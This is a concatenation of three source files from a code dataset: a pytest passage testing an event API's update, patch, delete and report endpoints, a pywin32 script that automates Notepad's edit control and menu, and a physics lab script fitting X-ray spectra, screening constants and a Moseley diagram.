event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["recurrence_rule"] = "RRULE:FREQ=SCHMAILY;COUNT=7"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_missingName(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["name"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_missingPlace(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["place"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_placeFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
place_id = seeder.upsert_default_event_place(other_admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, create_put(place_id, organizer_id))
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_missingOrganizer(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["organizer"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_organizerFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
organizer_id = seeder.upsert_default_event_organizer(other_admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, create_put(place_id, organizer_id))
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_co_organizers(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
organizer_a_id = seeder.upsert_event_organizer(admin_unit_id, "Organizer A")
organizer_b_id = seeder.upsert_event_organizer(admin_unit_id, "Organizer B")
put = create_put(place_id, organizer_id)
put["co_organizers"] = [
{"id": organizer_a_id},
{"id": organizer_b_id},
]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert len(event.co_organizers) == 2
assert event.co_organizers[0].id == organizer_a_id
assert event.co_organizers[1].id == organizer_b_id
def test_put_co_organizerFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
organizer_a_id = seeder.upsert_event_organizer(other_admin_unit_id, "Organizer A")
put = create_put(place_id, organizer_id)
put["co_organizers"] = [
{"id": organizer_a_id},
]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_invalidDateFormat(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="07.02.2021T11:00:00.000Z")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_startAfterEnd(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["start"] = "2021-02-07T11:00:00.000Z"
put["date_definitions"][0]["end"] = "2021-02-07T10:59:00.000Z"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
def test_put_durationMoreThanMaxAllowedDuration(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["start"] = "2021-02-07T11:00:00.000Z"
put["date_definitions"][0]["end"] = "2021-02-21T11:01:00.000Z"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
def test_put_categories(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
category_id = seeder.get_event_category_id("Art")
put = create_put(place_id, organizer_id)
put["categories"] = [{"id": category_id}]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.category.name == "Art"
def test_put_dateWithTimezone(client, seeder, utils, app):
from project.dateutils import create_berlin_date
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="2030-12-31T14:30:00+01:00")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
expected = create_berlin_date(2030, 12, 31, 14, 30)
event = Event.query.get(event_id)
assert event.date_definitions[0].start == expected
def test_put_dateWithoutTimezone(client, seeder, utils, app):
from project.dateutils import create_berlin_date
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="2030-12-31T14:30:00")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
expected = create_berlin_date(2030, 12, 31, 14, 30)
event = Event.query.get(event_id)
assert event.date_definitions[0].start == expected
def test_put_referencedEventUpdate_sendsMail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_user_id = seeder.create_user("[email protected]")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
put = create_put(place_id, organizer_id)
put["name"] = "Changed name"
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
utils.assert_send_mail_called(mail_mock, "[email protected]")
def test_put_referencedEventNonDirtyUpdate_doesNotSendMail(
client, seeder, utils, app, mocker
):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_user_id = seeder.create_user("[email protected]")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
put = create_put(place_id, organizer_id)
put["name"] = "Name"
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
mail_mock.assert_not_called()
def test_patch(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(url, {"description": "Neu"})
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.name == "Name"
assert event.description == "Neu"
def test_patch_startAfterEnd(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{
"date_definitions": [
{"start": "2021-02-07T11:00:00.000Z", "end": "2021-02-07T10:59:00.000Z"}
]
},
)
utils.assert_response_bad_request(response)
def test_patch_referencedEventUpdate_sendsMail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
other_user_id = seeder.create_user("[email protected]")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(url, {"name": "Changed name"})
utils.assert_response_no_content(response)
utils.assert_send_mail_called(mail_mock, "[email protected]")
def test_patch_photo(client, seeder, utils, app, requests_mock):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
requests_mock.get(
"https://image.com", content=base64.b64decode(seeder.get_default_image_base64())
)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": {"image_url": "https://image.com"}},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.photo is not None
assert event.photo.encoding_format == "image/png"
def test_patch_photo_copyright(client, db, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": {"copyright_text": "Heiner"}},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.photo.id == image_id
assert event.photo.data is not None
assert event.photo.copyright_text == "Heiner"
def test_patch_photo_delete(client, db, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": None},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event, Image
event = Event.query.get(event_id)
assert event.photo_id is None
image = Image.query.get(image_id)
assert image is None
def test_delete(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.delete(url)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event is None
def test_report_mail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_base(admin=False, log_in=False)
event_id = seeder.create_event(admin_unit_id)
seeder.create_user(email="[email protected]", admin=True)
seeder.create_user(email="[email protected]", admin=False)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event_reports", id=event_id)
response = utils.post_json(
url,
{
"contact_name": "Firstname Lastname",
"contact_email": "[email protected]",
"message": "Diese Veranstaltung wird nicht stattfinden.",
},
)
utils.assert_response_no_content(response)
utils.assert_send_mail_called(
mail_mock,
["[email protected]", "[email protected]"],
[
"Firstname Lastname",
"[email protected]",
"Diese Veranstaltung wird nicht stattfinden.",
],
)
| 35.896254 | 88 | 0.717726 |
c84751c41e478f6c77fd672807e33fc6eb22acec
| 1,906 |
py
|
Python
|
hello/hello_pywin32.py
|
East196/hello-py
|
a77c7a0c8e5e2b5e8cefaf0fda335ab0c3b1da21
|
[
"Apache-2.0"
] | 1 |
2017-10-23T14:58:47.000Z
|
2017-10-23T14:58:47.000Z
|
hello/hello_pywin32.py
|
East196/hello-py
|
a77c7a0c8e5e2b5e8cefaf0fda335ab0c3b1da21
|
[
"Apache-2.0"
] | null | null | null |
hello/hello_pywin32.py
|
East196/hello-py
|
a77c7a0c8e5e2b5e8cefaf0fda335ab0c3b1da21
|
[
"Apache-2.0"
] | 1 |
2018-04-06T07:49:18.000Z
|
2018-04-06T07:49:18.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import win32api
import win32gui
import win32con
print("Hello,world!")
def find_idxSubHandle(pHandle, winClass, index=0):
"""
已知子窗口的窗体类名
寻找第index号个同类型的兄弟窗口
"""
assert type(index) == int and index >= 0
handle = win32gui.FindWindowEx(pHandle, 0, winClass, None)
while index > 0:
handle = win32gui.FindWindowEx(pHandle, handle, winClass, None)
index -= 1
return handle
def find_subHandle(pHandle, winClassList):
"""
递归寻找子窗口的句柄
pHandle是祖父窗口的句柄
winClassList是各个子窗口的class列表,父辈的list-index小于子辈
"""
assert type(winClassList) == list
if len(winClassList) == 1:
return find_idxSubHandle(pHandle, winClassList[0][0], winClassList[0][1])
else:
pHandle = find_idxSubHandle(pHandle, winClassList[0][0], winClassList[0][1])
return find_subHandle(pHandle, winClassList[1:])
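# Example: handle of a control nested two levels deep (a sketch; the actual
# class names and indices depend on the target window's hierarchy):
# edit = find_subHandle(parent, [("ComboBoxEx32", 0), ("Edit", 0)])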
"""输出phandle的所有子控件"""
def p_sub_handle(phandle):
handle = -1
while handle != 0:
if handle == -1:
handle = 0
handle = win32gui.FindWindowEx(phandle, handle, None, None)
if handle != 0:
className = win32gui.GetClassName(handle)
print(className)
"""
记事本实例
"""
notepadHhandle = win32gui.FindWindow("Notepad", None)
print(("%x" % (notepadHhandle)))
editHandle = find_subHandle(notepadHhandle, [("Edit", 0)])
print(("%x" % (editHandle)))
"""修改edit中的值"""
win32api.SendMessage(editHandle, win32con.WM_SETTEXT, 0, "666666")
command_dict = {  # [menu item index, title of the window it opens]
    "open": [3, "打开"]  # "打开" = title of the "Open" dialog on a Chinese-language UI
}
"""操作菜单"""
menu = win32gui.GetMenu(notepadHhandle)
menu = win32gui.GetSubMenu(menu, 0)
cmd_ID = win32gui.GetMenuItemID(menu, command_dict["open"][0])
if cmd_ID == -1:
print("没有找到相应的菜单")
else:
print(("菜单id:%x" % (cmd_ID)))
win32gui.PostMessage(notepadHhandle, win32con.WM_COMMAND, cmd_ID, 0)
| 25.078947 | 84 | 0.641133 |
23f19c07ee75091be23abf40007b89cc7a6aeb40
| 17,291 |
py
|
Python
|
AP_SS16/602/PythonSkript.py
|
DimensionalScoop/kautschuk
|
90403f97cd60b9716cb6a06668196891d5d96578
|
[
"MIT"
] | 3 |
2016-04-27T17:07:00.000Z
|
2022-02-02T15:43:15.000Z
|
AP_SS16/602/PythonSkript.py
|
DimensionalScoop/kautschuk
|
90403f97cd60b9716cb6a06668196891d5d96578
|
[
"MIT"
] | 5 |
2016-04-27T17:10:03.000Z
|
2017-06-20T14:54:20.000Z
|
AP_SS16/602/PythonSkript.py
|
DimensionalScoop/kautschuk
|
90403f97cd60b9716cb6a06668196891d5d96578
|
[
"MIT"
] | null | null | null |
##################################################### Import system libraries ######################################################
import matplotlib as mpl
mpl.rcdefaults()
mpl.rcParams.update(mpl.rc_params_from_file('meine-matplotlibrc'))
import matplotlib.pyplot as plt
import numpy as np
import scipy.constants as const
import uncertainties.unumpy as unp
from uncertainties import ufloat
from uncertainties.unumpy import (
nominal_values as noms,
std_devs as stds,
)
################################################ Finish importing system libraries #################################################
################################################ Adding subfolder to system's path #################################################
import os, sys, inspect
# realpath() will make your script run, even if you symlink it :)
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
# use this if you want to include modules from a subfolder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"python_custom_scripts")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
############################################# Finish adding subfolder to system's path #############################################
##################################################### Import custom libraries ######################################################
from curve_fit import ucurve_fit
from table import (
make_table,
make_full_table,
make_composed_table,
make_SI,
write,
)
from regression import (
reg_linear,
reg_quadratic,
reg_cubic
)
from error_calculation import(
MeanError
)
################################################ Finish importing custom libraries #################################################
import math
from scipy.interpolate import UnivariateSpline
# Planck
h = 4.135667516e-15 # eV second
# vacuum speed of light
c = 299792458 # metre per second
# diffraction distance
d = 201.4e-12 # metre
#elementary charge
e = 1.6e-19#coulomb
#Rydbergonstante
r = 13.6 #eV
#sommerfeldsche Feinstrukturkonstante
s_k = 7.29e-3
zwei_theta, impulsrate = np.genfromtxt('messdaten/1_Messung_werte.txt', unpack=True)
write('build/Tabelle_messung_1.tex', make_table([zwei_theta,impulsrate],[1, 0])) # every value with an uncertainty gets two columns
write('build/Tabelle_messung_1_texformat.tex', make_full_table(
'Messdaten Bragg Bedingung.',
'table:A2',
'build/Tabelle_messung_1.tex',
    [], # careful: these numbers denote the resulting column indices
    # that are to be rendered as multicolumns
[
r'$\theta \:/\: \si{\degree}$',
r'$Zaehlrate$']))
theta, Z = np.loadtxt("messdaten/Bremsberg_werte.txt", unpack=True)
theta = theta/2
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
# plt.xlabel(r'$t \:/\: \si{\milli\second}$')
#plt.title("Emissionsspektrum einer Cu-Anode bei 35 kV")
plt.grid()
plt.xticks()
plt.yticks()
plt.annotate(r'$K_\alpha$', xy=(46.5/2, 6499))
plt.annotate(r'$K_\beta$', xy=(41.5/2, 2000))
plt.annotate(r'Bremsberg', xy=(20/2, 750))
plt.plot(theta, Z,'b-', label='Interpolation')
plt.legend(loc='best')
plt.savefig("build/cu-emission.pdf")
plt.close()
# print("hallo")
# #np.arcsin(0.5)
# print(np.arcsin(1))
# print(np.sin(90))
# import math
# print("try")
# print(math.sin(90))
# print(math.cos(math.radians(1)))
#### Determination of the cutoff angle ####
print("Result")
#lamb1 = math.sin(math.radians(5.4)) * 2* 201.4*10**(-12)
lamb_min = 2*d*np.sin(np.deg2rad(5.4))
E_max = h*c/lamb_min
write('build/lambda_min.tex', make_SI(lamb_min*1e12, r'\pico\meter', figures=2)) # number of significant figures
write('build/E_max.tex', make_SI(E_max*1e-3, r'\kilo\electronvolt', figures=2)) # number of significant figures
#### Full width at half maximum ####
def halbwertsbreite(x, y):
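    # shifting the curve down by half its maximum turns the two half-maximum
    # points into roots of the interpolating spline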
spline = UnivariateSpline(x, y-np.max(y)/2, s=0)
r1, r2 = spline.roots() # find the roots
lambda1 = 2*d*np.sin(np.deg2rad(r1))
lambda2 = 2*d*np.sin(np.deg2rad(r2))
E1 = h*c/lambda1
E2 = h*c/lambda2
DE = E1 - E2
    print('half-maximum angles: {0:.5e} deg, {1:.5e} deg'.format(r1, r2))
    print('FWHM: {0:.5e}'.format(np.abs(r1-r2)))
    print(u'energy resolution: {0:.5e} eV'.format(DE))
xnew = np.linspace(min(x), max(x))
ynew = spline(xnew)
plt.plot(x, y, 'rx', label='Messdaten')
plt.plot(xnew, ynew+np.max(y)/2,'b-', label='Interpolation')
plt.axvline(r1)
plt.axvline(r2)
plt.grid()
plt.legend()
plt.xlabel("doppelter Kristallwinkel in Grad")
plt.ylabel(u"Zählrate")
###############################################################
spline = UnivariateSpline(theta[84:90], Z[84:90]-np.max(Z[84:90])/2, s=0)
r1, r2 = spline.roots() # find the roots
lambda1 = 2*d*np.sin(np.deg2rad(r1))
lambda2 = 2*d*np.sin(np.deg2rad(r2))
E1 = h*c/lambda1
E2 = h*c/lambda2
DE = E1 - E2
print('half-maximum angles: {0:.5e} deg, {1:.5e} deg'.format(r1, r2))
print('FWHM: {0:.5e}'.format(np.abs(r1-r2)))
print(u'energy resolution: {0:.5e} eV'.format(DE))
xnew = np.linspace(min(theta[84:90]), max(theta[84:90]))
ynew = spline(xnew)
plt.plot(theta[84:90], Z[84:90], 'rx', label='Messdaten')
plt.plot(xnew, ynew+np.max(Z[84:90])/2,'b-', label='Interpolation')
plt.axvline(r1)
plt.axvline(r2)
plt.grid()
plt.legend(loc='best')
# plt.xlabel("doppelter Kristallwinkel in Grad")
# plt.ylabel(u"Zählrate")
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
write('build/Halbwertswinkel_beta_1.tex', make_SI(r1, r'\degree', figures=2))
write('build/Halbwertswinkel_beta_2.tex', make_SI(r2, r'\degree', figures=2))
write('build/Halbwertsbreite_beta.tex', make_SI(np.abs(r1-r2), r'\degree', figures=2))
write('build/Energieaufloesung_beta.tex', make_SI(DE*1e-3, r'\kilo\electronvolt', figures=2))
plt.savefig("build/halbwertsbreiten_beta.pdf")
plt.close()
#halbwertsbreite(theta[96:101], Z[96:101])
spline = UnivariateSpline(theta[96:101], Z[96:101]-np.max(Z[96:101])/2, s=0)
r1, r2 = spline.roots() # find the roots
lambda1 = 2*d*np.sin(np.deg2rad(r1))
lambda2 = 2*d*np.sin(np.deg2rad(r2))
E1 = h*c/lambda1
E2 = h*c/lambda2
DE = E1 - E2
print('half-maximum angles: {0:.5e} deg, {1:.5e} deg'.format(r1, r2))
print('FWHM: {0:.5e}'.format(np.abs(r1-r2)))
print(u'energy resolution: {0:.5e} eV'.format(DE))
xnew = np.linspace(min(theta[96:101]), max(theta[96:101]))
ynew = spline(xnew)
plt.plot(theta[96:101], Z[96:101], 'rx', label='Messdaten')
plt.plot(xnew, ynew+np.max(Z[96:101])/2,'b-', label='Interpolation')
plt.axvline(r1)
plt.axvline(r2)
plt.grid()
plt.legend(loc='best')
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
write('build/Halbwertswinkel_alpha_1.tex', make_SI(r1, r'\degree', figures=2))
write('build/Halbwertswinkel_alpha_2.tex', make_SI(r2, r'\degree', figures=2))
write('build/Halbwertsbreite_alpha.tex', make_SI(np.abs(r1-r2), r'\degree', figures=2))
write('build/Energieaufloesung_alpha.tex', make_SI(DE*1e-3, r'\kilo\electronvolt', figures=2))
write('build/Absorptionsenergie_Kupfer.tex', make_SI(E1*1e-3, r' ', figures=2))
plt.savefig("build/halbwertsbreiten_alpha.pdf")
plt.close()
##################### screening constant
theta_alpha = 47.2/2
theta_beta = 42.8/2
write('build/theta_alpha.tex', make_SI(theta_alpha, r'\degree', figures=2))
write('build/theta_beta.tex', make_SI(theta_beta, r'\degree', figures=2))
lambda_alpha = 2*d*np.sin(np.deg2rad(theta_alpha))
lambda_beta = 2*d*np.sin(np.deg2rad(theta_beta))
E_alpha = h*c/lambda_alpha
E_beta = h*c/lambda_beta
sigma_1 = 29 - np.sqrt(E_beta/r)
sigma_2 = 29 -2* np.sqrt((r*((29-sigma_1)**2) - E_alpha)/r)
write('build/sigma_1.tex', make_SI(sigma_1, r' ', figures=2))
write('build/sigma_2.tex', make_SI(sigma_2, r' ', figures=2))
## literature values
sigma_1_lit = 29 - np.sqrt(8903/r)
sigma_2_lit = 29 -2* np.sqrt((r*((29-sigma_1)**2) - 8046)/r)
write('build/sigma_1_lit.tex', make_SI(sigma_1_lit, r' ', figures=2))
write('build/sigma_2_lit.tex', make_SI(sigma_2_lit, r' ', figures=2))
#write('build/Energiedifferenz.tex', make_SI(6268-1919, r'\electronvolt', figures=2)) # read off
#######################
# the absorption spectra, plots
## Germanium
plt.clf()
theta_ger, Z_ger = np.genfromtxt('messdaten/Germanium.txt', unpack=True)
theta_ger = theta_ger/2
# plt.plot(theta_ger, Z_ger)
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
plt.grid()
# plt.xticks()
# plt.yticks()
plt.plot(theta_ger, Z_ger,'b-', label='Messdaten')
plt.legend(loc='best')
plt.savefig("build/Germanium.pdf")
plt.close()
## Zinc
theta_zink, Z_zink = np.genfromtxt('messdaten/Zink.txt', unpack=True)
theta_zink = theta_zink/2
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
plt.grid()
plt.xticks()
plt.yticks()
plt.plot(theta_zink, Z_zink,'b-', label='Messdaten')
plt.legend(loc='best')
plt.savefig("build/Zink.pdf")
plt.close()
## Zirconium
theta_zir, Z_zir = np.genfromtxt('messdaten/Zirkonium.txt', unpack=True)
theta_zir = theta_zir/2
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
plt.grid()
plt.xticks()
plt.yticks()
plt.plot(theta_zir, Z_zir,'b-', label='Messdaten')
plt.legend(loc='best')
plt.savefig("build/Zirkonium.pdf")
plt.close()
##Gold
theta_gold, Z_gold = np.genfromtxt('messdaten/Gold.txt', unpack=True)
theta_gold = theta_gold/2
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
plt.grid()
plt.xticks()
plt.yticks()
plt.plot(theta_gold, Z_gold,'b-', label='Messdaten')
plt.legend(loc='best')
plt.savefig("build/Gold.pdf")
plt.close()
#### energy determination
def Grade(x_1, y_1, x_2, y_2):
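    # linear interpolation: returns the x at which the straight line through
    # (x_1, y_1) and (x_2, y_2) reaches the mean of y_1 and y_2 (the edge position)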
m = (y_2-y_1)/(x_2-x_1)
b = y_1 - m*x_1
y = (y_2 + y_1)/2
x = (y-b)/m
return x
##Germanium
theta_ger_x = Grade(theta_ger[32], Z_ger[32], theta_ger[35], Z_ger[35])
lambda_ger = 2*d*np.sin(np.deg2rad(theta_ger_x))
E_ger = h*c/lambda_ger
write('build/Absorptionsenergie_Germanium.tex', make_SI(E_ger*1e-3, r'\kilo\electronvolt', figures=2))
write('build/Absorptionsenergie_Germanium_ohne.tex', make_SI(E_ger*1e-3, r' ', figures=2))
## Zinc
theta_zink_x = Grade(theta_zink[30], Z_zink[30], theta_zink[35], Z_zink[35])
lambda_zink = 2*d*np.sin(np.deg2rad(theta_zink_x))
E_zink = h*c/lambda_zink
write('build/Absorptionsenergie_Zink.tex', make_SI(E_zink*1e-3, r'\kilo\electronvolt', figures=2))
write('build/Absorptionsenergie_Zink_ohne.tex', make_SI(E_zink*1e-3, r' ', figures=2))
## Zirconium
theta_zir_x = Grade(theta_zir[23], Z_zir[23], theta_zir[27], Z_zir[27])
lambda_zir = 2*d*np.sin(np.deg2rad(theta_zir_x))
E_zir = h*c/lambda_zir
write('build/Absorptionsenergie_Zirkonium.tex', make_SI(E_zir*1e-3, r'\kilo\electronvolt', figures=2))
write('build/Absorptionsenergie_Zirkonium_ohne.tex', make_SI(E_zir*1e-3, r' ', figures=2))
#### determination of the screening constants
sigma_ger = 32 - np.sqrt((E_ger/r) -((s_k**2)/4)*32**4)
sigma_zink = 30 - np.sqrt((E_zink/r) -((s_k**2)/4)*30**4)
sigma_zir = 40 - np.sqrt((E_zir/r) -((s_k**2)/4)*40**4)
write('build/Abschirmkonstante_Germanium.tex', make_SI(sigma_ger, r' ', figures=2))
write('build/Abschirmkonstante_Zink.tex', make_SI(sigma_zink, r' ', figures=2))
write('build/Abschirmkonstante_Zirkonium.tex', make_SI(sigma_zir, r' ', figures=2))
# Moseley diagram
E_k = (E_zink, E_ger, E_zir)
Z = (30,32,40) # Zn, Ge, Zr
E_k_wurzel = np.sqrt(E_k)
params = ucurve_fit(reg_linear, Z, E_k_wurzel)
m,b = params
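# Moseley plot: sqrt(E_K) is linear in the atomic number Z; the fit assumes
# E_K = (3/4) * hc*R_inf * (Z - sigma)^2, so the slope m gives hc*R_inf = 4/3 * m**2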
write('build/hcRydbergonstante.tex', make_SI(4/3*m**2, r'\electronvolt', figures=1))
write('build/Rydbergonstante.tex', make_SI(4/3*m**2/(h*c), r'\per\meter', figures=1))
plt.clf()
t_plot = np.linspace(25,45, 100)
plt.plot(t_plot , reg_linear(t_plot, *noms(params)), 'b-', label='Fit')
plt.plot(Z, E_k_wurzel, 'rx', label='Messdaten')
plt.xlabel(r'Kernladungszahl $Z$')
plt.ylabel(r'$\sqrt{E_\textrm{k} \:/\: \si{\kilo\electronvolt}}$')
plt.legend(loc='best')
plt.savefig("build/Moseley_Diagramm.pdf")
plt.close()
################################ FREQUENTLY USED CODE ################################
#
########## IMPORT ##########
# t, U, U_err = np.genfromtxt('data.txt', unpack=True)
# t *= 1e-3
########## ERRORS ##########
# R_unc = ufloat(R[0],R[2])
